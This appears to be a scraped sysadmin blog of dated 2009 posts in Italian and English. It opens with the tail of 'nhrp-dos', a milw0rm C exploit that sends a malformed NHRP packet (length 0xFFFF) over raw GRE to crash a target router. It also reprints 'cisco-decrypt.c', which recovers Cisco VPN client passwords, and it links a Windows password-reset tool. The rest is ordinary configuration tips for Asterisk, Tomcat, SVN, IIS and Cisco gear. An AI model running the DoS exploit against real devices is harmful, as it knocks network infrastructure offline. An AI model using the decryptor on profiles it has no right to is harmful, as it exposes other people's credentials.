unsigned long client_nbma_sub; /* NHRP client NBMA subaddr */
unsigned long client_pro_addr; /* NHRP client protocol addr */
} mand;

/* NHRP client information entries (CIE) */
union {
struct {
unsigned short code:8; /* NHRP code */
unsigned short pref_len:8; /* NHRP prefix length */
unsigned short reserved; /* NHRP reserved */
unsigned short mtu; /* NHRP MTU */
unsigned short holding_time; /* NHRP holding time */
unsigned short len_client:8; /* NHRP t/l cl addr */
unsigned short len_client_sub:8;/* NHRP t/l cl sub */
unsigned short len_client_pro:8;/* NHRP t/l cl pro */
unsigned short preference:8; /* NHRP preference */
unsigned short ext; /* NHRP extension */
} cie;
};
};

/* Main function */
int main (int argc, char **argv) {
/* Check command line */
if(argc != 4) {
fprintf(stderr, "\nnhrp-dos (c) by Martin Kluge <mk@elxsi.de>, 2007\n");
fprintf(stderr, "------------------------------------------------\n");
fprintf(stderr, "Usage: ./nhrp-dos <device> <target> <GRE key>\n");
fprintf(stderr, "(Set GRE key = 0 to disable GRE keys!)\n\n");
exit(EXIT_FAILURE);
}

/* Check UID */
if(getuid() != 0 && geteuid() != 0) {
fprintf(stderr, "Error: Please run as root!\n");
exit(EXIT_FAILURE);
}

/* Open a socket */
sockfd = open_socket();

/* Send DoS packet */
send_dos(sockfd, get_int_ipv4(argv[1]), resolve_ip(argv[2]), atoi(argv[3]));

/* Close the socket */
close_socket(sockfd);

exit(EXIT_SUCCESS);
}

/* Open the socket */
int open_socket (void)
{
int fd;
int one = 1;
void *ptr = &one;

/* Open the socket */
fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
if(fd < 0) {
fprintf(stderr, "Error: open_socket: Unable to open socket.\n");
exit(EXIT_FAILURE);
}

/* Set IP_HDRINCL to include the IPv4 header in outgoing packets. */
/* Otherwise it would be done by the kernel. */
if(setsockopt(fd, IPPROTO_IP, IP_HDRINCL, ptr, sizeof(one)) < 0) {
fprintf(stderr, "Error: open_socket: setsockopt failed.\n");
exit(EXIT_FAILURE);
}

#ifndef _BSD
if(setsockopt(fd, IPPROTO_IP, SO_BROADCAST, ptr, sizeof(one)) < 0) {
fprintf(stderr,"Error: open_socket: setsockopt failed.\n");
exit(EXIT_FAILURE);
}
#endif

return(fd);
}

/* Close the socket */
int close_socket (int fd)
{
return(close(fd));
}

/* Resolve the hostname to IP address */
unsigned long resolve_ip (char *host)
{
struct in_addr addr;
struct hostent *host_ent;

if((addr.s_addr = inet_addr(host)) == -1) {
if(!(host_ent = gethostbyname(host)))
return(-1);

memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
}

return(addr.s_addr);
}

/* Get IPv4 address of DEVICE */
unsigned long get_int_ipv4 (char *device)
{
int tmp_fd;
struct ifreq ifr;
struct sockaddr_in *sin;

tmp_fd = socket(PF_INET, SOCK_DGRAM, 0);

if(tmp_fd < 0) {
fprintf(stderr, "Error: get_int_ipv4: socket failed.\n");
exit(EXIT_FAILURE);
}

memset(&ifr, 0, sizeof(ifr));
sin = (struct sockaddr_in *) &ifr.ifr_addr;
strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));

ifr.ifr_addr.sa_family = AF_INET;

if(ioctl(tmp_fd, SIOCGIFADDR, (char *) &ifr) < 0) {
fprintf(stderr, "Error: get_int_ipv4: ioctl failed.\n");
exit(EXIT_FAILURE);
}

close(tmp_fd);
return(sin->sin_addr.s_addr);
}

/* Send NHRP packet */
int send_dos (int fd, unsigned long src_ip, unsigned long dst_ip,
unsigned long gre_key)
{
struct ip ip_hdr;
struct ip *iphdr;
struct gre_h gre_hdr;
struct nhrp_h nhrp_hdr;
struct sockaddr_in sin;
unsigned int bytes = 0;
int GRE_SIZE = GRE_HDR_SIZE;

/* Packet buffer */
unsigned char *buf;

if(gre_key!=0)
GRE_SIZE+=GRE_KEY_SIZE;

/* Allocate some memory */
buf = malloc(IP_HDR_SIZE+GRE_SIZE+NHRP_HDR_SIZE);

if(buf < 0) {
fprintf(stderr, "Error: send_dos: malloc failed.\n");
exit(EXIT_FAILURE);
}

/* Increment NHRP request ID */
nhrp_req_id++;

/* IPv4 Header */
ip_hdr.ip_v = 4; /* IP version */
ip_hdr.ip_hl = 5; /* IP header length */
ip_hdr.ip_tos = 0x00; /* IP ToS */
ip_hdr.ip_len = htons(IP_HDR_SIZE +
GRE_SIZE +
NHRP_HDR_SIZE
); /* IP total length */
ip_hdr.ip_id = 0; /* IP identification */
ip_hdr.ip_off = 0; /* IP frag offset */
ip_hdr.ip_ttl = 64; /* IP time to live */
ip_hdr.ip_p = IPPROTO_GRE; /* IP protocol */
ip_hdr.ip_sum = 0; /* IP checksum */
ip_hdr.ip_src.s_addr = src_ip; /* IP source */
ip_hdr.ip_dst.s_addr = dst_ip; /* IP destination */

/* GRE header */
if(gre_key != 0) {
gre_hdr.flags = htons(0x2000); /* GRE flags */
gre_hdr.key = htonl(gre_key); /* GRE key */
} else {
gre_hdr.flags = 0;
}

gre_hdr.ptype = htons(0x2001); /* GRE type (NHRP) */

/* NHRP fixed header */
nhrp_hdr.fixed.afn = htons(0x0001); /* NHRP AFN */
nhrp_hdr.fixed.proto = htons(0x0800); /* NHRP protocol type */
nhrp_hdr.fixed.snap = 0; /* NHRP SNAP */
nhrp_hdr.fixed.snapE = 0; /* NHRP SNAP */
nhrp_hdr.fixed.hops = 0xFF; /* NHRP hop count */

/* DoS -> Set length to 0xFFFF */
nhrp_hdr.fixed.length = htons(0xFFFF); /* NHRP length */

/* Checksum can be incorrect */
nhrp_hdr.fixed.checksum = 0; /* NHRP checksum */

nhrp_hdr.fixed.mpoa_ext = htons(0x0034); /* NHRP MPOA ext */
nhrp_hdr.fixed.version = 1; /* NHRP version */
nhrp_hdr.fixed.type = 3; /* NHRP type */
nhrp_hdr.fixed.nbma_addr= 4; /* NHRP NBMA t/l addr */
nhrp_hdr.fixed.nbma_sub = 0; /* NHRP NBMA t/l sub */

/* NHRP mandatory part */
nhrp_hdr.mand.src_len = 4; /* NHRP src proto len */
nhrp_hdr.mand.dst_len = 4; /* NHRP dst proto len */
nhrp_hdr.mand.flags = htons(0x8000); /* NHRP flags */
nhrp_hdr.mand.request_id = htonl(nhrp_req_id); /* NHRP request ID */
nhrp_hdr.mand.client_nbma = src_ip; /* NHRP client addr */
nhrp_hdr.mand.client_nbma_sub = 0; /* NHRP client sub */
nhrp_hdr.mand.client_pro_addr = 0; /* NHRP client proto */

/* NHRP client information entries (CIE) */
nhrp_hdr.cie.code = 0; /* NHRP code */
nhrp_hdr.cie.pref_len = 0xFF; /* NHRP prefix len */
nhrp_hdr.cie.reserved = 0x0000; /* NHRP reserved */
nhrp_hdr.cie.mtu = htons(1514); /* NHRP mtu */
nhrp_hdr.cie.holding_time = htons(30); /* NHRP holding time */
nhrp_hdr.cie.len_client = 0; /* NHRP t/l client */
nhrp_hdr.cie.len_client_sub = 0; /* NHRP t/l sub */
nhrp_hdr.cie.len_client_pro = 0; /* NHRP t/l pro */
nhrp_hdr.cie.preference = 0; /* NHRP preference */
nhrp_hdr.cie.ext = htons(0x8003); /* NHRP C/U/Type (ext)*/

/* Copy the IPv4 header to the buffer */
memcpy(buf, (unsigned char *) &ip_hdr, sizeof(ip_hdr));

/* Copy the GRE header to the buffer */
memcpy(buf + IP_HDR_SIZE, (unsigned char *) &gre_hdr, sizeof(gre_hdr));

/* Copy the NHRP header to the buffer */
memcpy(buf + IP_HDR_SIZE + GRE_SIZE, (unsigned char *) &nhrp_hdr,
sizeof(nhrp_hdr));

/* Fix some BSD bugs */
#ifdef _BSD
iphdr = (struct ip *) buf;
iphdr->ip_len = ntohs(iphdr->ip_len);
iphdr->ip_off = ntohs(iphdr->ip_off);
#endif

memset(&sin, 0, sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = iphdr->ip_dst.s_addr;

printf("\nnhrp-dos (c) by Martin Kluge <mk@elxsi.de>, 2007\n");
printf("------------------------------------------------\n");
printf("Sending DoS packet...");

/* Send the packet */
bytes = sendto(fd, buf, IP_HDR_SIZE + GRE_SIZE + NHRP_HDR_SIZE, 0,
(struct sockaddr *) &sin, sizeof(struct sockaddr));

printf("DONE (%d bytes)\n\n", bytes);

/* Free the buffer */
free(buf);

/* Return number of bytes */
return(bytes);
}

// milw0rm.com [2007-08-09]


[/codesyntax]

Download

Sep 14, 2009 at 1:45 am 0

Auto Check – OpenVPN

Su connessioni fastweb usando openvpn è in caso di restart dei router di destinazione spesso le sessioni restano appese e non viene ristabilito il tunnel, in teoria questo bug è stato risolto nelle ultime release, per non rischiare 4 righe di script:

#!/bin/bash
if ! ping -c 1 -w 5 "xxx.xxx.xxx.xxx" &>/dev/null ; then
/etc/init.d/openvpn restart
fi

Eseguite ogni 5 minuti come da cron:

*/5 * * * * /root/yeahup

Sep 4, 2009 at 1:07 pm 0

BlackBerry – Full Wipe

Blackberry “Wipe-Handheld” command list:

=> Options menu
=> Security Options
=> General Settings
=> Menu
=> Wipe handheld
=> Enter password (“blackberry” by default or your security password)

Aug 20, 2009 at 2:28 am 0

cisco-decrypt.c

/* Decoder for password encoding of Cisco VPN client.
Copyright (C) 2005 Maurice Massar
Thanks to HAL-9000@evilscientists.de for decoding and posting the algorithm!This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

/*
Requires libgcrypt version 1.1.90 or newer
Compile with:
gcc -Wall -o cisco-decrypt cisco-decrypt.c $(libgcrypt-config --libs --cflags)
Usage:
./cisco-decrypt DEADBEEF...012345678 424242...7261
*/

#include <stdio.h>
#include <stdlib.h>
#include <gcrypt.h>
#include <errno.h>

int hex2bin_c(unsigned int c)
{
if ((c >= '0')&&(c <= '9'))
return c - '0';
if ((c >= 'A')&&(c <= 'F'))
return c - 'A' + 10;
if ((c >= 'a')&&(c <= 'f'))
return c - 'a' + 10;
return -1;
}

int hex2bin(const char *str, char **bin, int *len)
{
char *p;
int i, l;

if (!bin)
return EINVAL;

for (i = 0; str[i] != '\0'; i++)
if (hex2bin_c(str[i]) == -1)
return EINVAL;

l = i;
if ((l & 1) != 0)
return EINVAL;
l /= 2;

p = malloc(l);
if (p == NULL)
return ENOMEM;

for (i = 0; i < l; i++)
p[i] = hex2bin_c(str[i*2]) << 4 | hex2bin_c(str[i*2+1]);

*bin = p;
if (len)
*len = l;

return 0;
}

int c_decrypt(char *ct, int len, char **resp, char *reslenp)
{
const char *h1 = ct;
const char *h4 = ct + 20;
const char *enc = ct + 40;

char ht[20], h2[20], h3[20], key[24];
const char *iv = h1;
char *res;
gcry_cipher_hd_t ctx;
int reslen;

if (len < 48)
return 0;
len -= 40;

memcpy(ht, h1, 20);

ht[19]++;
gcry_md_hash_buffer(GCRY_MD_SHA1, h2, ht, 20);

ht[19] += 2;
gcry_md_hash_buffer(GCRY_MD_SHA1, h3, ht, 20);

memcpy(key, h2, 20);
memcpy(key+20, h3, 4);
/* who cares about parity anyway? */

gcry_md_hash_buffer(GCRY_MD_SHA1, ht, enc, len);

if (memcmp(h4, ht, 20) != 0)
return -1;

res = malloc(len);
if (res == NULL)
return -1;

gcry_cipher_open(&ctx, GCRY_CIPHER_3DES, GCRY_CIPHER_MODE_CBC, 0);
gcry_cipher_setkey(ctx, key, 24);
gcry_cipher_setiv(ctx, iv, 8);
gcry_cipher_decrypt(ctx, (unsigned char *)res, len, (unsigned char *)enc, len);
gcry_cipher_close(ctx);

reslen = len - res[len-1];
res[reslen] = '\0';

if (resp)
*resp = res;
if (reslenp)
*reslenp = reslen;
return 0;
}

int main(int argc, char *argv[])
{
int i, len, ret = 0;
char *bin, *pw;

gcry_check_version(NULL);

for (i = 1; i < argc; i++) {
ret = hex2bin(argv[i], &bin, &len);
if (ret != 0) {
perror("decoding input");
continue;
}
ret = c_decrypt(bin, len, &pw, NULL);
free(bin);
if (ret != 0) {
perror("decrypting input");
continue;
}
printf("%s\n", pw);
free(pw);
}

exit(ret != 0);
}

Download: cisco-decrypt

Aug 15, 2009 at 3:27 pm 0

Windows – Reset resolution from registry

Durante una migrazione di datacenter mi è capitato di aver fuori uso la console di un server perchè la risoluzione della scheda video è fuori range del monitor, avendo accesso RDP la soluzione è presto trovata dal registro di sistema nella seguente posizione:

My Computer\HKEY_CURRENT_CONFIG\System\CurrentControlSet\Control\VIDEO

Trovando la stringa “Monitor” si potrebbe cambiare direttamente la risoluzione, ma personalmente ho cancellato tutto il contenuto e riavviato così facendo ha ricreato le configurazione di default.

Aug 11, 2009 at 10:08 pm 0

OpenSSH – Generate server key

OpenSSH require different keys depending if you use SSH1 or SSH2 protocol. All keys are generated by “ssh-keygen” commad, that one should be available on your system with the ssh package. Default key lengths are also appropriate (2048 bits for rsa and 1024 bits for dsa)
For SSH1 protocol, you need a rsa1 key generated has follow:

# ssh-keygen -q -f /etc/ssh/ssh_host_key -N '' -t rsa1

For SSH2 protocol, you need two keys, one rsa key and one dsa key generated has follow:

# ssh-keygen -f /etc/ssh/ssh_host_rsa_key -N '' -t rsa
# ssh-keygen -f /etc/ssh/ssh_host_dsa_key -N '' -t dsa

Aug 6, 2009 at 12:32 am 0

Cisco ASA – Enable SSH

If you have tried to setup SSH access on a new ASA, it might not have worked the way you wanted. That is because the RSA keys need to be generated first. To do that:

from configure terminal:

fw01/act(config)# crypto key generate rsaINFO: The name for the keys will be:

Keypair generation process begin. Please wait…

And then configure SSH to be allowed from the inside interface:

fw01/act(config)# ssh (inser your ip) (insert your netmask) outside

Now you can configure AAA and setup your own username.

First, a username needs to be created:

fw01/act(config)# username leonardo password mypassword privilege 15

And then configure AAA:

fw01/act(config)# aaa authentication ssh console LOCAL

Jul 22, 2009 at 10:57 am 0

Vim – Fix arrow keys that display A B C D on remote shell

A little fix for arrow keys in Vim, that display A B C D on remote terminal if in the system you don’t wanna declare “TERM” just insert into yout ~/.vimrc the terminal type like this:

set term=xterm

Jul 21, 2009 at 3:09 am 0

Cool Tools for OpenSPARC

Optimized Applications for Solaris OS and OpenSparc computing.

Simple and very useful example is “Cool Stack” a web deployment packge include most commonly used free and open source applications, recompiled to deliver a 30 to 200 percent performance improvement over standard binaries compiled with GCC.

Cool Tools.

Jul 21, 2009 at 2:52 am 0

CSW packaging

Memo: Solaris package.

CSW packaging home.

Jul 18, 2009 at 5:06 am 0

Satellite

9° Est

9° Est

Recentemente ho rifatto i puntamenti di alcune parabole, qui in particolare il grafico dello spettro del satellite Eurobird 9° Est (Ex Hotbird 2 ora riposizionato) facente parte della flotta Eutelsat.

Jul 18, 2009 at 4:55 am 0

Asterisk – Eutelia SIP

Questo risulta essere un argomento un po’ delicato sopratutto sconsigliato a chi non ha un minimo di dimestichezza con asterisk, dal momento che non mi dilunghero troppo in spiegazioni sul funzionamento ma darò indicazioni essenziali e basta.

Chiunque abbia provato ad usare asterisk su eutelia una volta skypho è sicuramente incappato in qualche problema sia sulla parte di registrazione sia sulla parte di streaming dei flussi rtp, la spiegazione di tutto ciò è abbastanza semplice eutelia appoggia il sistema sip che distribuisce ai cliente utilizzando il Cisco SIP Gateway, lo si può capire velocemente facendo debug. Questa soluzione spesso non è molto propensa a dialogare con asterik in modo standard, pertanto se state usando interfacce GUI o soluzioni embedded potete smettere di leggere perchè la maggior parte delle volte è impossibile uscire dagli schemi imposti.

Ora il problema:
capita che registrando due o più trunk con numerazione in ingresso nonostante la definizione di context diversi per ogni numero, la chiamata diretta a numeri differenti segua sempre la stessa strada anche definendo DID e non facendo Catchall sul trunk/context stesso; questo succede perchè tutto il flusso in arrivo da eutelia viene riconosciuto e inoltrato sul primo trunk che si registra presso il gateway.
Fra le possibili soluzioni ci sarebbe avere un ip pubblico per trunk oppure come letto in giro per la rete modificare la porta da 5060 a 5061 e così via.. Certo sono soluzioni possibili ma per niente pratiche e a volte poco stabili.

La soluzione testata e affidabile usando 4 trunk è la seguente:
-premessa sullo scenario nel mio caso il pbx è nattato utilizzando un ip pubblico statico, ma la stessa soluzione è testata anche su un pbx con ip pubblico in routing senza nat.
-nelle configurazioni i numeri sono oscurati ommettendo le ultime tre cifre con XXX e al posto delle password è inserita la parola “mysecret”

Prima cosa definiamo il trunk e il context principale nel file /etc/asterisk/users.conf qui è importante definire il primo trunk o quello preferito per le chiamate in uscita dato che lo stesso context può essere usato anche per quello.

[eutelia]
type = friend
srvlookup = yes
realm = voip.eutelia.it
username = 0245071XXX
secret = mysecret
fromuser = 0245071XXX
fromdomain=voip.eutelia.it
qualify = yes
insecure = port,invite
host = voip.eutelia.it
context = from-eutelia
nat = yes
canreinvite = no
disallow = all
allow = ulaw
allow = alaw
useragent=Asterisk_Eut

Successivamente definiamo la registrazione dei numeri aggiuntivi nel file /etc/asterisk/sip.conf:

register => 0245071XXX:mysecret@eutelia/0245071XXX
register => 0245072XXX:mysecret@eutelia/0245072XXX
register => 0245073XXX:mysecret@eutelia/0245073XXX
register => 0245074XXX:mysecret@eutelia/0245074XXX

Ora l’ultima fase definiamo dove far andare le chiamate e dove farle uscire, questo nel file /etc/asterisk/extensions.conf

#DID in ingresso dal context di eutelia qui definiamo dove dirottare le chiamate, nel primo esempio vanno ad un gruppo di chiamata, nel secondo ad un voice menu, nel terzo ad un exetension SCCP e infine nel quarto ad un extension SIP

[from-eutelia]
exten => 0245071XXX,1,GoTo(ringroup1,s,1)
exten => 0245072XXX,1,GoTo(voicemenu1,s,1)
exten => 0245073XXX,1,Dial(SCCP/114)
exten => 0245074XXX,1,Dial(SIP/112)

Ora per definire le chiamate in uscita dovete andare nel vostro context principale in cui sono definite le regole per le extension e il dialplan, tipicamente lo riconoscete perché è quello definito nel file user all’interno delle singole extension, nel mi caso di chiama “DialPlan01″

#Questo formato inoltra qualsiasi chiamata preceduta dal condice di impegno della linea “0″ sul trunk eutelia ovviamente rimuovenlo prima dell’inoltro:

[DialPlan01]
exten = _0.,1,Dial(SIP/eutelia/${EXTEN:1})
exten => 112,1,dial(SIP/112)
exten => 114,1,dial(SCCP/114)

Ammetto che lo “0″ per l’impegno delle linee è una cosa abbastanza antiquata derivata dai vecchi pbx a cui in parte sono ancora affezzionato, è possibile benissimo definirla in questo modo:

exten = _.,1,Dial(SIP/eutelia/${EXTEN})

In modo che tutte le chiamate non locali vengano inoltrate direttemente sul trunk.

Jul 18, 2009 at 4:06 am 0

IIS Socket Pooling

C’è una cosa brutta da sapere e si scopre quando per caso proviamo ad installare un servizio in ascolto sulla porta 80 su windows che ha già attivo per sfortuna nostra IIS, si chiama socket pooling, infatti automaticamente iis decide di essere in ascolto su tutti i socket quindi ogni indirizzo configurato sulla macchina, impedendo l’avvio di qualsiasi altro servizio (es. apache) anche se apparentemente configurato correttamente.

Per ovviare a questo problema ecco come fare:
-Prima di tutto installate i support tools, dove sono? Inserite il cd nella directory \Support\Tools trovate un pacchetto suptools.msi
-Ora potete procedere:

Definizione dello scenario in questo caso un server con windows con i seguenti ip:
xxx.xxx.xxx.xxx (destinato a iis)
yyy.yyy.yyy.yyy (destinato ad altro webserver)

from cmd (support tool shell):


#settiamo l'ip in ascolto di iis
httpcfg set iplisten -i xxx.xxx.xxx.xxx
#eliminiamo l'ascolto di iis su questo ip
httpcfg delete iplisten -i yyy.yyy.yyy.yyy

#verifichiamo di non aver fatto errori
httpcfg query iplisten

#riavviamo il tutto per rendere effettive le modifiche
net stop http /y
net start w3svc

Nota: queste operazioni sono testate su IIS6 quindi sulle piattaforme Windows 2003 (tutte le versioni) non posso garantire il funzionamento identico su 2008

Jul 18, 2009 at 3:40 am 0

Miaoo – Tomcat su Debian

Breve draft su come installare tomcat su debian, in questo caso lenny, le versioni dei pacchetti potrebbero cambiare ma il risultato finale è quello.

Partiamo installando quello che ci serve:

#apt-get install tomcat5.5 tomcat5.5-admin sun-java5-jdk tomcat5.5-webapps

Attenzione, se l’installazione debian di default sicuramente non trovo il java jdk, è necessario quindi aggiungere il repository non-free, in apt editando in questo modo: /etc/apt/source.list

deb http://your-mirror-url/debian/ lenny main non-free
deb-src http://your-mirror-url/debian/ lenny main non-free

Configurare il sistema per utilizzare java

srv01#update-alternatives --config java

There are 2 alternatives which provide ‘java’.

Selection Alternative
———————————————–
1 /usr/lib/jvm/java-1.5.0-sun/jre/bin/java
*+ 2 /etc/alternatives/kaffe-system/bin/java

Press enter to keep the default[*], or type selection number:

digitiamo 1 per attivare /usr/lib/jvm/java-1.5.0-sun/jre/bin/java

Definiamo il runtime java specifico installato e reso di default nel sistema come da step precendenti, editando il file /etc/default/tomcat5.5 e aggiungendo:

JAVA_HOME=/usr/lib/jvm/java-1.5.0-sun/

Definiamo ora gli utenti per l’interffaccia di gestione editando il file /var/lib/tomcat5.5/conf/tomcat-users.xml e creando una struttura simile:

<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="tomcat"/>
<role rolename="role1"/>
<role rolename="standard"/>
<role rolename="manager"/>
<role rolename="admin"/>
<user username="tomcat" password="pwd" roles="tomcat,admin"/>
<user username="both" password="pwd" roles="tomcat,role1"/>
<user username="role1" password="pwd" roles="role1"/>
<user username="leo" password="pwd" fullName="leonardo" roles="standard"/>
<user username="manager" password="pwd" fullName="" roles="manager"/>
</tomcat-users>

In questo caso sono definiti 3 utenti, due principali e uno definito dall’utente (manager, admin, leo)

Fatto questo avviamo tomcat o riavviamolo se già attivo:

srv01#/etc/init.d/tomcat5.5 start o restart

Di default il server è in ascolto sulla porta 8180 quindi per accedere andare all’indirizzo:

http://ipserver:8180/

Nota: nel mio caso ho usato il pacchetto jdk5 che contiene il java 1.5.0 è disponibile anche a scelta il pacchetto 1.6.0 ovviamente di chiama jdk6

Jul 18, 2009 at 2:57 am 0

SCSI R.I.P.

During a raining night..

Syslog tail:

Jul 18 03:02:18 pbx01 kernel: [265460.092056] >>>>>>>>> Dump Card State Begins <<<<<<<<
Jul 18 03:02:18 pbx01 kernel: [265460.092059] scsi0: Dumping Card State in Command phase,/
at SEQADDR 0×157
Jul 18 03:02:18 pbx01 kernel: [265460.092063] Card was paused
[cut]
Jul 18 03:02:18 pbx01 kernel: [265460.092511] Pending list:
Jul 18 03:02:18 pbx01 kernel: [265460.092514] 6 SCB_CONTROL[0x60]:(TAG_ENB|DISCENB)
Jul 18 03:02:18 pbx01 kernel: [265460.092521] SCB_SCSIID[0x7] SCB_LUN[0x0]
Jul 18 03:02:18 pbx01 kernel: [265460.092526] 2 SCB_CONTROL[0x74]: /
(DISCONNECTED|MK_MESSAGE|TAG_ENB|DISCENB)
Jul 18 03:02:18 pbx01 kernel: [265460.092534] SCB_SCSIID[0x7] SCB_LUN[0x0]
Jul 18 03:02:18 pbx01 kernel: [265460.092539] 3 SCB_CONTROL[0x0] SCB_SCSIID[0x7] SCB_LUN[0x0]
Jul 18 03:02:18 pbx01 kernel: [265460.092547] Kernel Free SCB list: 7 1 4 5 11 10 9 8
Jul 18 03:02:18 pbx01 kernel: [265460.092556]
Jul 18 03:02:18 pbx01 kernel: [265460.092558] <<<<<<<<< Dump Card State Ends >>>>>>>>>
Jul 18 03:02:18 pbx01 kernel: [265460.092570] scsi0:0:0:0: Cmd aborted from QINFIFO
Jul 18 03:02:18 pbx01 kernel: [265460.092579] aic7xxx_abort returns 0×2002
Jul 18 03:02:18 pbx01 kernel: [265460.092590] sd 0:0:0:0: [sda] Attempting to queue a TARGET RESET message
Jul 18 03:02:18 pbx01 kernel: [265460.092594] CDB: 0x2a 0×0 0×0 0x5a 0xf3 0xbc 0×0 0×0 0×8 0×0
Jul 18 03:02:18 pbx01 kernel: [265460.092604] aic7xxx_dev_reset returns 0×2003
Jul 18 03:02:18 pbx01 kernel: [265460.092655] Recovery SCB completes
Jul 18 03:02:18 pbx01 kernel: [265460.092696] Recovery SCB completes
pbx01:/#
pbx01:/# Timeout, server not responding.
leobook2-w:~ leonardorizzi$

Ouch!

Jul 1, 2009 at 7:15 pm 0

Cisco – Autosave scp

Non ho mai trovato la giusta implementazione per usarla, ma questo dovrebbe copiare la configurazione di apparati cisco automaticamente ad ogni salvataggio:

archive
path scp://leo:xxxxxx@hostname/home/leo/router-backups/router
write-memory

Jul 1, 2009 at 6:49 pm 0

Offline Windows password & registry editor

Just another link of useful utility:

http://home.eunet.no/pnordahl/ntpasswd/

May 19, 2009 at 12:06 am 0

Dump System log on Windows

If you wanna to dump windows event log, in readable format form debug youre fucking .NET application running on IIS you can do this:

Fist of all you need a special tool for this “dumpel.exe” (in pure Microsoft style) part of Windows Resource Kit 2000 (yeah only 9 year ago):
You can download from http://support.microsoft.com/kb/927229
Then create a bat or vbs file with this command:

dumpel.exe -l Application -f "\\path-to\app_log\app_all.csv"

Apr 27, 2009 at 2:16 am 1

Mac OS X – Cisco VPN Client

If you are running Cisco’s VPN Client on Mac OSX, you might be familiar with (or tormented by) “Error 51: Unable to communicate with the VPN subsystem”. The simple fix is to quit VPN Client, open a Terminal window, (Applications -> Utilities -> Terminal) and type the following from root user:

# /System/Library/StartupItems/CiscoVPN/CiscoVPN restart

Stopping Cisco Systems VPN Driver
kextunload: unload kext /System/Library/Extensions/CiscoVPN.kext succeeded
Starting Cisco Systems VPN Driver
kextload: /System/Library/Extensions/CiscoVPN.kext loaded successfully

Apr 13, 2009 at 7:14 pm 0

Cisco – page breaks

On Router IOS:

To stop the page breaks:

# terminal length 0

To resume them:

# terminal no length 0 (or number ex. 24)

On Pix/ASA:
To stop the page breaks.

# no pager

To resume them:

# pager 24

Apr 13, 2009 at 7:08 pm 0

Cisco – Get & Save config using telnet

Vi è mai capitato di dover salvare delle configurazione da apparati cisco senza avere un tftp a disposizione?

In aiuto un piccolo script:

#!/bin/bash
host=xx.xx.xx.xx
port=23
login=user
passwd=pass
nobreak='terminal length 0'
cmd='show running-config all'
(echo open ${host} ${port}
sleep 1
echo ${login}
sleep 1
echo ${passwd}
sleep 1
echo ${nobreak}
sleep 1
echo ${cmd}
sleep 30
echo exit) | telnet > sw01.txt

Mar 29, 2009 at 12:59 pm 0

Configuring the svnserve daemon

- Creating the repositories

If you have not created any subversion repositories yet, you can create one with svnadmin:

# svnadmin create ~/my-repository

- Tweaking svnserve.conf

Open up and edit the svnserve.conf file located in the $HOME/my-repo/conf/ directory.

#
# Sample $HOME/my-repo/conf/svnserve.conf
#
[general]

# Path to the file containing svn users and passwords.
password-db = $HOME/my-repo/conf/passwd

# Authentication realm of the repository. Two repositories using the
# same password-db should have the same realm.
realm = My-test-repository

# Deny all anonymous access
anon-access = none

# Grant authenticated users read and write privileges
auth-access = write

- Setting up password authentication

Open up and edit the password-db file (ie. $HOME/my-repo/conf/passwd). A sample entry might look like this:

[users]
user1 = password1
user2 = password2

- Starting up the server

Run the server by invoking svnserve with the -d switch (daemon mode) and –listen-host 1.2.3.4 (substituting 1.2.3.4 for your v-host IP address).

# svnserve -d –listen-host 1.2.3.4 -r $HOME/my-repo

To ensure that your svnserve gets started whenever the server is booted, you must add a @reboot line to your crontab. Use the crontab -e command to bring up your crontab in your favorite text editor and add the following line:

@reboot svnserve -d –listen-host 1.2.3.4 -r $HOME/my-repo

- Testing the server

To test the server’s functionality, you can create a working copy of your repository using your shell. The checkout command will create a working copy of the repository:

# svn co svn://your-domain.com/$HOME/my-repo my-working-dir
# cd my-working-dir
# echo “foo bar” > test-file
# svn add test-file
# svn remove test-file
# svn commit

Mar 29, 2009 at 12:53 pm 0

Configuring subversion access over HTTP/DAV

- Creating the repository

If you have not created any Subversion repositories yet, you can create one with svnadmin:

# svnadmin create ~/my-repository

Adding mod_dav_svn to your httpd

# a2enmod mod_dav_svn

If you plan to use fine-grained permissions, load mod_authz_svn.so as well:

# a2enmod mod_authz_svn
- Configuring access to repositories

HTTP access to your repositories is defined using a <Location> section in your httpd.conf.

<Location /myproject>
DAV svn
SVNPath /home/myself/myrepos/myproject
AuthType Basic
AuthName “My project”
AuthUserFile /home/myself/private/myproject.pw
Order deny,allow
<LimitExcept GET PROPFIND OPTIONS REPORT>
Require valid-user
</LimitExcept>
</Location>

This entry would grant read-only access to everyone and write access to every user AuthUserFile. You can use the htpasswd utility to create or update this file, as described here.

The next entry grants read/write access to users in the AuthUserFile, and no access to anyone else.

<Location /myproject>
DAV svn
SVNPath /home/myself/myrepos/myproject
AuthType Basic
AuthName “My project”
AuthUserFile /home/myself/private/myproject.pw
Order deny,allow
Require valid-user
</Location>

The previous examples all define access on a per-repository basis. It is also possible to grant access from specific users to specific areas of the repository, using fine-grained permissions.

- Testing the repository

Using either a remote Subversion client or the standard svn command from your shell, you can generate your working copy of the repository with the checkout command. If you are accessing public data over a read-only account, you can use a standard http URL:

# svn co http://your-domain/myproject/

If you are accessing private data or using a read/write account, make sure to use an https URL:

# svn co https://your-domain/myproject/

The contents of public repositories are also accessible from a web browser. Keep in mind that search engines will try to index any public data, so you may want to use a robots.txt file.

- Using fine-grained permissions (optional)

You can allow or deny specific users read/write privileges on specific items within a repository using AuthzSVNAccessFile. If you use this directive, make sure the mod_authz_svn module is loaded.

<Location /repos>
DAV svn
SVNPath /home/myself/myrepos

# Access Control via the authz module.
AuthzSVNAccessFile /home/myself/private/myrepos.acl
# Anonymous access is allowed. Prompt as needed.
Satisfy Any
Require valid-user
AuthType Basic
AuthName “My subversion repositories”
AuthUserFile /home/myself/private/myrepos.pw
</Location>

The file specified in AuthzSVNAccessFile is a plain text file which defines fine-grained access lists. Note that all path names specified are relative to the SVNPath.

#
# Allow anonymous read access to everything by default.
#
[/]
* = r

#
